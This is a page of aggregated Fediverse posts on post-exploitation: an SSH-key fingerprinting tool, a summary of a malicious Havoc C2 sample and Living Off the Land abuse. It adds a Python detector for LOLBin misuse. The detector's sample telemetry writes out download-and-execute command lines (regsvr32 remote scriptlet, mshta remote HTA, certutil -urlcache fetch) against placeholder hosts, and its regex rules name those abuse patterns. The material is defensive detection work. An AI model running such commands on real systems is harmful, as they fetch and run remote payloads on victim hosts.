#postexploitation — Public Fediverse posts
Live and recent posts from across the Fediverse tagged #postexploitation, aggregated by home.social.
-
Introducing KeyChecker – a CLI to fingerprint SSH private keys & map them to Git hosting accounts.
We have been talking about this in our classes for a long while; finally, automation is present now.
Blog: https://cyfinoid.com/automating-a-known-weakness-introducing-keychecker/
PyPI: https://pypi.org/project/keychecker/
-
Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.
@FortiGuardLabs just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.
Built for red teamers but abused by threat actors, this sample goes full dark mode:
- Shellcode loader in C++
- AES-encrypted payload
- XOR junk code to slow reverse engineering
- Dynamic API resolving
- LOLBin delivery via regsvr32
It’s like someone asked: “What if malware devs went full GitHub?” (never go full GitHub)
🔗 Full breakdown:
https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sample
TL;DR for blue teamers:
- Havoc ≠ harmless just because it’s open source
- Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins
- Watch for process injection + thread creation anomalies
- Memory analysis > file-based detection here
- Don’t assume your EDR is catching every beacon on port 443
Is it threat emulation or a real attack?
— Blue teamer having a full-blown identity crisis at 2am
Shoutout to @xpzhang and team for their amazing work!
#ThreatIntel #MalwareAnalysis #HavocC2 #RedTeamTools #PostExploitation #Infosec #BlueTeam #ReverseEngineering #CyberSecurity
-
They don’t need malware. They weaponize what’s already trusted - PowerShell, WMI, CertUtil. This is Living Off the Land. Defend or be devoured.
#LOLBins #infosec #cybersecurity #redteam #ethicalhacking #windowssecurity #postexploitation #DeadSwitch
http://tomsitcafe.com/2025/05/06/living-off-the-land-how-hackers-use-your-tools-against-you/
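The "TL;DR for blue teamers" list in the Havoc post above and this Living Off the Land post come down to the same defensive task: watch trusted Windows binaries (regsvr32, rundll32, mshta, certutil, PowerShell, WMI) for the command-line arguments and parent processes that signal abuse rather than normal administration. The Python below is an added example, not code from any of the posts or from the vendors they link. It runs a small set of indicator rules over constructed process-creation records whose fields are modelled on Sysmon Event ID 1 telemetry (Image, CommandLine, ParentImage); the binary list, the regexes, the parent-process heuristic and every sample event are assumptions made for the demonstration, using reserved `example.invalid` hostnames.

```python
"""LOLBin abuse detection over process-creation telemetry (added example).

Each record mimics a Sysmon Event ID 1 / EDR process-creation event. The
rules flag the argument patterns that distinguish abuse of a trusted binary
from its ordinary use, and add a hit when an Office process is the parent.
"""
import re
from dataclasses import dataclass

# Trusted binaries worth watching; the posts above name most of these.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe",
           "powershell.exe", "wmic.exe"}

# Per-binary indicators as (name, regex over the command line). Assumed rule
# set for illustration; a production ruleset would be tuned to the estate.
INDICATORS = {
    "regsvr32.exe": [
        ("remote-scriptlet", re.compile(r"/i:\s*(https?|ftp)://", re.I)),
        ("scrobj-load", re.compile(r"scrobj\.dll", re.I)),
    ],
    "rundll32.exe": [
        ("script-protocol", re.compile(r"\b(javascript|vbscript):", re.I)),
        ("user-writable-dll", re.compile(r"\\(Users|Temp|AppData)\\[^ ]+\.dll", re.I)),
    ],
    "mshta.exe": [
        ("remote-hta", re.compile(r"https?://", re.I)),
        ("inline-script", re.compile(r"\b(javascript|vbscript):", re.I)),
    ],
    "certutil.exe": [
        ("download", re.compile(r"-urlcache", re.I)),
        ("decode", re.compile(r"-decode(hex)?\b", re.I)),
    ],
    "powershell.exe": [
        ("encoded-command", re.compile(r"\s-(e|ec|enc|encodedcommand)\s", re.I)),
        ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ],
    "wmic.exe": [
        ("remote-process-create", re.compile(r"process\s+call\s+create", re.I)),
    ],
}

# Document-handling parents that should almost never launch these binaries.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}


@dataclass
class Finding:
    event_id: int
    image: str
    parent: str
    indicators: list


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict):
    """Return a Finding for one process-creation event, or None if benign."""
    image = basename(event["Image"])
    if image not in LOLBINS:
        return None
    hits = [name for name, rx in INDICATORS.get(image, [])
            if rx.search(event["CommandLine"])]
    parent = basename(event["ParentImage"])
    if parent in SUSPICIOUS_PARENTS:
        hits.append("office-parent")
    return Finding(event["EventId"], image, parent, hits) if hits else None


def analyze(events) -> list:
    """Run every event through the rules; benign events produce no finding."""
    return [f for f in map(analyze_event, events) if f is not None]


# Constructed sample telemetry: two ordinary admin actions, three abuse patterns.
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\plugin.dll"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"EventId": 2, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll",
     "ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE"},
    {"EventId": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/page.hta",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventId": 4, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/x.bin C:\Users\Public\x.bin",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventId": 5, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.image} <- {f.parent}: {', '.join(f.indicators)}")
```

Events 1 and 5 are deliberately benign uses of watched binaries and produce no finding, which is the point of matching on arguments and parentage rather than on the image name alone: alerting on every regsvr32 or PowerShell launch drowns the signal the posts are asking you to look for.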
-
Now that you’ve seen #WhatTheVuln Episode 2 featuring Lindsay Von Tish and Allan Cecil, check out the corresponding technical write-up where you can take a deep dive into how to use #LoLBins to bypass #EDR protection and install a #C2 agent for advanced #postexploitation control.
And don’t fret if you missed the initial livestream – you can watch the recording on demand! https://bfx.social/3K4T1mS
P.S. Episode 3 is on the way!